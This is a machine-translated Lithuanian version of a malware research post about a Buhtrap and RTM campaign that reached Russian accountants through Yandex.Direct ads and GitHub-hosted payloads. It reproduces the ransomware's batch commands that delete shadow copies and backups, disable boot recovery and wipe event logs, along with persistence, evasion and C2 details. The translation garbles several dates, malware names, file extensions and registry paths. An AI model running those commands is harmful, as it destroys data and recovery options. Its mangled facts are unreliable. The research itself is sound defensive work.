Norėdami nukreipti buhalterius į kibernetinę ataką, galite naudoti darbo dokumentus, kurių jie ieško internete. Maždaug taip per pastaruosius kelis mėnesius darė kibernetinė grupė, platindama žinomas užpakalines duris. и , taip pat šifruokliai ir programinė įranga kriptovaliutoms vogti. Dauguma taikinių yra Rusijoje. Ataka buvo įvykdyta patalpinus kenkėjišką reklamą „Yandex.Direct“. Potencialios aukos buvo nukreiptos į svetainę, kur jų buvo paprašyta atsisiųsti kenkėjišką failą, užmaskuotą kaip dokumento šabloną. Po mūsų įspėjimo „Yandex“ pašalino kenkėjišką reklamą.
Buhtrap šaltinio kodas praeityje buvo nutekėjęs internete, todėl visi gali juo naudotis. Neturime informacijos apie RTM kodo prieinamumą.
Šiame įraše papasakosime, kaip užpuolikai platino kenkėjiškas programas naudodami „Yandex.Direct“ ir priglobė ją „GitHub“. Įrašas bus baigtas technine kenkėjiškų programų analize.
Buhtrap ir RTM grįžta į verslą
Plitimo mechanizmas ir aukos
Įvairūs aukoms pristatomi kroviniai turi bendrą sklaidos mechanizmą. Visi užpuolikų sukurti kenkėjiški failai buvo patalpinti į dvi skirtingas „GitHub“ saugyklas.
Paprastai saugykloje buvo vienas atsisiunčiamas kenkėjiškas failas, kuris dažnai keitėsi. Kadangi „GitHub“ leidžia peržiūrėti saugyklos pakeitimų istoriją, galime matyti, kokia kenkėjiška programa buvo platinama per tam tikrą laikotarpį. Siekiant įtikinti auką atsisiųsti kenkėjišką failą, buvo panaudota svetainė blanki-shabloni24[.]ru, parodyta aukščiau esančiame paveikslėlyje.
Svetainės dizainas ir visi kenkėjiškų failų pavadinimai vadovaujasi viena koncepcija – formos, šablonai, sutartys, pavyzdžiai ir tt. Atsižvelgiant į tai, kad Buhtrap ir RTM programinė įranga jau buvo naudojama atakuojant buhalterius praeityje, darėme prielaidą, kad naujosios kampanijos strategija yra tokia pati. Vienintelis klausimas, kaip auka pateko į užpuolikų svetainę.
Infekcija
Bent keletą potencialių aukų, atsidūrusių šioje svetainėje, pritraukė kenkėjiška reklama. Žemiau pateikiamas URL pavyzdys:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Kaip matote iš nuorodos, reklamjuostė buvo patalpinta teisėtame apskaitos forume bb.f2[.]kz. Svarbu pažymėti, kad reklamjuostės pasirodė skirtingose svetainėse, visos turėjo tą patį kampanijos ID (blanki_rsya) ir dauguma buvo susijusios su apskaitos ar teisinės pagalbos paslaugomis. URL rodo, kad potenciali auka panaudojo užklausą „atsisiųsti sąskaitos faktūros formą“, kuri patvirtina mūsų hipotezę dėl tikslinių atakų. Žemiau pateikiamos svetainės, kuriose pasirodė reklamjuostės, ir atitinkamos paieškos užklausos.
- parsisiųsti sąskaitos faktūros formą – bb.f2[.]kz
- sutarties pavyzdys – Ipopen[.]ru
- prašymo skundo pavyzdys - 77metrov[.]ru
- susitarimo forma - blank-dogovor-kupli-prodazhi[.]ru
- teismo ieškinio pavyzdys – zen.yandex[.]ru
- skundo pavyzdys – yurday[.]ru
- sutarčių formų pavyzdžiai – Regforum[.]ru
- sutarties forma – assistentus[.]ru
- buto sutarties pavyzdys – napravah[.]com
- teisinių sutarčių pavyzdžiai - avito[.]ru
Svetainė blanki-shabloni24[.]ru galėjo būti sukonfigūruota taip, kad būtų atliktas paprastas vizualinis įvertinimas. Paprastai skelbimas, nukreipiantis į profesionaliai atrodančią svetainę su nuoroda į „GitHub“, neatrodo kaip kažkas akivaizdžiai blogo. Be to, užpuolikai į saugyklą įkėlė kenkėjiškų failų tik ribotą laikotarpį, greičiausiai kampanijos metu. Dažniausiai „GitHub“ saugykloje buvo tuščias ZIP archyvas arba švarus EXE failas. Taigi, užpuolikai galėjo platinti reklamą per „Yandex.Direct“ svetainėse, kuriose greičiausiai lankėsi buhalteriai, atėję atsakydami į konkrečias paieškos užklausas.
Toliau pažvelkime į įvairius tokiu būdu paskirstytus naudingus krovinius.
Naudingosios apkrovos analizė
Paskirstymo chronologija
Kenkėjiška kampanija prasidėjo 2018 m. spalio mėn. pabaigoje ir šiuo metu yra aktyvi. Kadangi visa saugykla buvo viešai prieinama „GitHub“, sudarėme tikslią šešių skirtingų kenkėjiškų programų šeimų platinimo laiko juostą (žr. paveikslėlį žemiau). Pridėjome eilutę, rodančią, kada reklamjuostės nuoroda buvo aptikta, matuojant ESET telemetrija, kad būtų galima palyginti su git istorija. Kaip matote, tai gerai koreliuoja su naudingosios apkrovos prieinamumu GitHub. Neatitikimas vasario pabaigoje gali būti paaiškintas tuo, kad neturėjome dalies pakeitimų istorijos, nes saugykla buvo pašalinta iš „GitHub“, nespėjome jos gauti visos.
1 pav. Kenkėjiškų programų platinimo chronologija.
Kodo pasirašymo sertifikatai
Kampanijoje buvo naudojami keli sertifikatai. Kai kuriuos iš jų pasirašė daugiau nei viena kenkėjiškų programų šeima, o tai dar labiau rodo, kad skirtingi pavyzdžiai priklausė tai pačiai kampanijai. Nepaisant privataus rakto prieinamumo, operatoriai sistemingai nepasirašė dvejetainių failų ir nenaudojo rakto visiems pavyzdžiams. 2019 m. vasario mėn. pabaigoje užpuolikai pradėjo kurti netinkamus parašus naudodami „Google“ priklausantį sertifikatą, kurio privataus rakto neturėjo.
Visi su kampanija susiję sertifikatai ir jų pasirašytos kenkėjiškų programų šeimos yra išvardytos toliau esančioje lentelėje.
Taip pat naudojome šiuos kodo pasirašymo sertifikatus, kad sukurtume ryšius su kitomis kenkėjiškų programų šeimomis. Daugumos sertifikatų neradome pavyzdžių, kurie nebuvo platinami per „GitHub“ saugyklą. Tačiau TOV „MARIYA“ sertifikatas buvo naudojamas botnetui priklausančiai kenkėjiškai programai pasirašyti , reklaminės programos ir kalnakasiai. Mažai tikėtina, kad ši kenkėjiška programa yra susijusi su šia kampanija. Labiausiai tikėtina, kad sertifikatas buvo pirktas „darknet“.
Win32/Filecoder.Buhtrap
Pirmasis mūsų dėmesį patraukęs komponentas buvo naujai atrastas Win32/Filecoder.Buhtrap. Tai dvejetainis „Delphi“ failas, kuris kartais yra supakuotas. Jis daugiausia buvo platinamas 2019 m. vasario–kovo mėnesiais. Ji elgiasi taip, kaip pridera išpirkos reikalaujančiai programai – ieško vietinių diskų ir tinklo aplankų bei užšifruoja aptiktus failus. Jam nereikia interneto ryšio, kad būtų pažeistas, nes jis nesusisiekia su serveriu, kad išsiųstų šifravimo raktus. Vietoj to, jis prideda „žetoną“ prie išpirkos pranešimo pabaigos ir siūlo susisiekti su operatoriais el. paštu arba „Bitmessage“.
Siekdama užšifruoti kuo daugiau jautrių išteklių, „Filecoder.Buhtrap“ paleidžia giją, skirtą išjungti pagrindinę programinę įrangą, kuri gali turėti atviras failų tvarkykles, kuriose yra vertingos informacijos, kuri gali trukdyti šifruoti. Tiksliniai procesai daugiausia yra duomenų bazių valdymo sistemos (DBVS). Be to, Filecoder.Buhtrap ištrina žurnalo failus ir atsargines kopijas, kad apsunkintų duomenų atkūrimą. Norėdami tai padaryti, paleiskite toliau pateiktą paketinį scenarijų.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap naudoja teisėtą internetinę IP registravimo paslaugą, skirtą informacijai apie svetainės lankytojus rinkti. Tai skirta stebėti išpirkos reikalaujančios programinės įrangos aukas, už kurias atsakinga komandų eilutė:
mshta.exe "javascript:document.write('');"
Šifruotini failai pasirenkami, jei jie neatitinka trijų išimčių sąrašų. Pirma, failai su šiais plėtiniais nėra užšifruoti: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys ir .šikšnosparnis. Antra, neįtraukiami visi failai, kurių visame kelyje yra katalogų eilutės iš toliau pateikto sąrašo.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Trečia, tam tikri failų pavadinimai taip pat neįtraukiami į šifravimą, įskaitant išpirkos pranešimo failo pavadinimą. Sąrašas pateikiamas žemiau. Akivaizdu, kad visos šios išimtys skirtos tam, kad mašina veiktų, tačiau minimali techninė apžiūra.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Failų šifravimo schema
Įvykdžius kenkėjišką programą, ji sukuria 512 bitų RSA raktų porą. Tada privatus eksponentas (d) ir modulis (n) užšifruojami kietai užkoduotu 2048 bitų viešuoju raktu (viešasis eksponentas ir modulis), supakuoti zlib ir užkoduoti baze64. Už tai atsakingas kodas parodytas 2 pav.
2 pav. 512 bitų RSA raktų poros generavimo proceso šešioliktainių spindulių dekompiliavimo rezultatas.
Žemiau pateikiamas paprasto teksto pavyzdys su sugeneruotu privačiu raktu, kuris yra prie išpirkos pranešimo pridėtas prieigos raktas.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Užpuoliko viešasis raktas pateiktas žemiau.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Failai šifruojami naudojant AES-128-CBC su 256 bitų raktu. Kiekvienam užšifruotam failui sukuriamas naujas raktas ir naujas inicijavimo vektorius. Pagrindinė informacija pridedama prie užšifruoto failo pabaigos. Panagrinėkime užšifruoto failo formatą.
Šifruoti failai turi tokią antraštę:
Šaltinio failo duomenys su VEGA magiška verte užšifruojami iki pirmųjų 0x5000 baitų. Visa iššifravimo informacija pridedama prie tokios struktūros failo:
- Failo dydžio žymeklyje yra ženklas, nurodantis, ar failas yra didesnis nei 0x5000 baitų
— AES rakto dėmė = ZlibCompress (RSAEncrypt (AES raktas + IV, sugeneruotos RSA raktų poros viešasis raktas))
- RSA rakto dėmė = ZlibCompress (RSAEncrypt (sugeneruotas RSA privatus raktas, kietai užkoduotas RSA viešasis raktas))
Win32 / ClipBanker
„Win32/ClipBanker“ yra komponentas, su pertraukomis platinamas nuo 2018 m. spalio pabaigos iki gruodžio pradžios. Jo vaidmuo yra stebėti iškarpinės turinį, ji ieško kriptovaliutų piniginių adresų. Nustačiusi tikslinį piniginės adresą, ClipBanker jį pakeičia adresu, kuris, kaip manoma, priklauso operatoriams. Mūsų ištirti mėginiai nebuvo nei supakuoti, nei užmaskuoti. Vienintelis mechanizmas, naudojamas maskuoti elgesį, yra eilučių šifravimas. Operatoriaus piniginės adresai užšifruojami naudojant RC4. Tikslinės kriptovaliutos yra Bitcoin, Bitcoin cash, Dogecoin, Ethereum ir Ripple.
Tuo metu, kai kenkėjiška programa plito į užpuolikų Bitcoin pinigines, nedidelė suma buvo išsiųsta VTS, o tai verčia abejoti kampanijos sėkme. Be to, nėra įrodymų, kad šie sandoriai buvo susiję su ClipBanker.
Win32/RTM
32 m. kovo pradžioje Win2019/RTM komponentas buvo platinamas kelias dienas. RTM yra Trojos bankininkas, parašytas Delphi, skirtas nuotolinėms bankų sistemoms. 2017 m. ESET mokslininkai paskelbė šios programos aprašymas vis dar aktualus. 2019 m. sausį taip pat išleido „Palo Alto Networks“. .
Buhtrap krautuvas
Kurį laiką „GitHub“ buvo galima atsisiųsti programą, kuri nebuvo panaši į ankstesnius „Buhtrap“ įrankius. Jis atsisuka į https://94.100.18[.]67/RSS.php?<some_id> gauti kitą etapą ir įkelti jį tiesiai į atmintį. Galime išskirti du antrojo etapo kodo veiksmus. Pirmajame URL RSS.php tiesiogiai perdavė Buhtrap galines duris – šios užpakalinės durys yra labai panašios į esančias po šaltinio kodo nutekėjimo.
Įdomu tai, kad matome keletą kampanijų su Buhtrap backdoor ir tariamai jas vykdo skirtingi operatoriai. Šiuo atveju pagrindinis skirtumas yra tas, kad užpakalinės durys įkeliamos tiesiai į atmintį ir nenaudoja įprastos schemos su DLL diegimo procesu, apie kurį kalbėjome. . Be to, operatoriai pakeitė tinklo srautui šifruoti naudojamą RC4 raktą į C&C serverį. Daugumoje kampanijų, kurias matėme, operatoriai nesivargino keisti šio rakto.
Antrasis, sudėtingesnis elgesys buvo tas, kad RSS.php URL buvo perduotas kitai įkrovikliui. Ji įgyvendino tam tikrą supainiojimą, pvz., atkūrė dinaminio importavimo lentelę. Įkrovos įkrovos tikslas yra susisiekti su C&C serveriu [.]com/api/F27F84EDA4D13B15/2, išsiųskite žurnalus ir laukite atsakymo. Jis apdoroja atsakymą kaip blob, įkelia jį į atmintį ir vykdo. Naudingasis krovinys, kurį matėme vykdant šį krautuvą, buvo tas pats „Buhtrap“ užpakalinės durys, tačiau gali būti ir kitų komponentų.
Android/Spy.Banker
Įdomu tai, kad „Android“ skirtas komponentas taip pat buvo rastas „GitHub“ saugykloje. Pagrindiniame filiale jis buvo tik vieną dieną – 1 m. lapkričio 2018 d. ESET telemetrija neranda jokių šios kenkėjiškos programinės įrangos platinimo įrodymų.
Komponentas buvo priglobtas kaip „Android“ programų paketas (APK). Tai labai užtemta. Kenkėjiška elgsena paslėpta užšifruotame JAR, esančiame APK. Jis užšifruotas RC4 naudojant šį raktą:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Tas pats raktas ir algoritmas naudojami eilutėms užšifruoti. JAR yra APK_ROOT + image/files. Pirmuose 4 failo baituose yra užšifruoto JAR ilgis, kuris prasideda iškart po ilgio lauko.
Iššifravę failą, sužinojome, kad tai buvo Anubis – anksčiau bankininkas, skirtas Android. Kenkėjiška programa turi šias funkcijas:
- mikrofono įrašymas
- darant ekrano kopijas
- gauti GPS koordinates
- klavišų registratorius
- įrenginio duomenų šifravimas ir išpirkos reikalavimas
- šiukšlių siuntimas
Įdomu tai, kad bankininkas naudojo „Twitter“ kaip atsarginį ryšio kanalą, kad gautų kitą C&C serverį. Mūsų analizuojamas pavyzdys naudojo @JonesTrader paskyrą, tačiau analizės metu ji jau buvo užblokuota.
Bankininkas pateikia tikslinių programų sąrašą „Android“ įrenginyje. Jis ilgesnis nei sąrašas, gautas Sophos tyrime. Sąraše yra daug bankininkystės programų, internetinių apsipirkimo programų, tokių kaip „Amazon“ ir „eBay“, ir kriptovaliutų paslaugų.
MSIL/ClipBanker.IH
Paskutinis komponentas, platinamas kaip šios kampanijos dalis, buvo .NET Windows vykdomasis failas, kuris pasirodė 2019 m. kovo mėn. Dauguma tirtų versijų buvo supakuotos su ConfuserEx v1.0.0. Kaip ir ClipBanker, šis komponentas naudoja mainų sritį. Jo tikslas – platus kriptovaliutų asortimentas, taip pat pasiūlymai Steam. Be to, jis naudoja IP Logger paslaugą, kad pavogtų Bitcoin privatų WIF raktą.
Apsaugos mechanizmai
Be privalumų, kuriuos suteikia „ConfuserEx“ užkertant kelią derinimui, pašalinimui ir klastojimui, komponentas apima galimybę aptikti antivirusinius produktus ir virtualias mašinas.
Siekdama patikrinti, ar ji veikia virtualioje mašinoje, kenkėjiška programa naudoja integruotą Windows WMI komandų eilutę (WMIC), kad prašytų BIOS informacijos, būtent:
wmic bios
Tada programa analizuoja komandos išvestį ir ieško raktinių žodžių: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Kad aptiktų antivirusinius produktus, kenkėjiška programa siunčia „Windows Management Instrumentation“ (WMI) užklausą „Windows“ saugos centrui naudodama ManagementObjectSearcher API, kaip parodyta toliau. Po dekodavimo iš base64 skambutis atrodo taip:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
3 pav. Antivirusinių produktų identifikavimo procesas.
Be to, kenkėjiška programa patikrina, ar , įrankis, apsaugantis nuo iškarpinės atakų ir, jei paleistas, sustabdo visas tame procese esančias gijas ir taip išjungia apsaugą.
Patvarumas
Kenkėjiškos programos versija, kurią ištyrėme, kopijuoja save %APPDATA%googleupdater.exe ir nustato google katalogo atributą „paslėptas“. Tada ji keičia vertę SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell „Windows“ registre ir prideda kelią updater.exe. Tokiu būdu kenkėjiška programa bus vykdoma kiekvieną kartą vartotojui prisijungus.
Piktybiškas elgesys
Kaip ir ClipBanker, kenkėjiška programa stebi iškarpinės turinį ir ieško kriptovaliutų piniginės adresų, o radusi pakeičia jį vienu iš operatoriaus adresų. Toliau pateikiamas tikslinių adresų sąrašas pagal tai, kas randama kode.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Kiekvienam adreso tipui yra atitinkama reguliarioji išraiška. STEAM_URL reikšmė naudojama atakuoti Steam sistemą, kaip matyti iš reguliaraus posakio, kuris naudojamas buferyje apibrėžti:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Eksfiltracijos kanalas
Be adresų pakeitimo buferyje, kenkėjiška programa nukreipta į privačius Bitcoin, Bitcoin Core ir Electrum Bitcoin piniginių WIF raktus. Programa naudoja plogger.org kaip išfiltravimo kanalą, kad gautų WIF privatųjį raktą. Norėdami tai padaryti, operatoriai prideda privataus rakto duomenis į User-Agent HTTP antraštę, kaip parodyta toliau.
4 pav. IP Logger konsolė su išvesties duomenimis.
Operatoriai nenaudojo iplogger.org, kad išfiltruotų pinigines. Tikriausiai jie pasirinko kitą metodą dėl 255 simbolių apribojimo lauke User-Agentrodomas IP Logger žiniatinklio sąsajoje. Mūsų tirtuose pavyzdžiuose kitas išvesties serveris buvo saugomas aplinkos kintamajame DiscordWebHook. Keista, bet šis aplinkos kintamasis niekur kode nepriskirtas. Tai rodo, kad kenkėjiška programa vis dar kuriama, o kintamasis priskirtas operatoriaus bandomajam įrenginiui.
Yra dar vienas ženklas, kad programa kuriama. Dvejetainiame faile yra du iplogger.org URL adresai, kurių abiejų užklausa, kai duomenys išfiltruojami. Vieno iš šių URL užklausoje prieš reikšmę lauke Referer yra „DEV /“. Taip pat radome versiją, kuri nebuvo supakuota naudojant „ConfuserEx“, šio URL gavėjas pavadintas DevFeedbackUrl. Remdamiesi aplinkos kintamojo pavadinimu, manome, kad operatoriai planuoja naudoti teisėtą paslaugą „Discord“ ir jos žiniatinklio perėmimo sistemą, kad pavogtų kriptovaliutų pinigines.
išvada
Ši kampanija yra teisėtų reklamos paslaugų naudojimo kibernetinėse atakose pavyzdys. Schema nukreipta į Rusijos organizacijas, tačiau nenustebtume pamatę tokią ataką naudojantis ne rusiškomis paslaugomis. Norėdami išvengti kompromisų, vartotojai turi būti tikri atsisiunčiamos programinės įrangos šaltinio reputacija.
Išsamų kompromiso rodiklių ir MITER ATT&CK atributų sąrašą rasite adresu .
Šaltinis: www.habr.com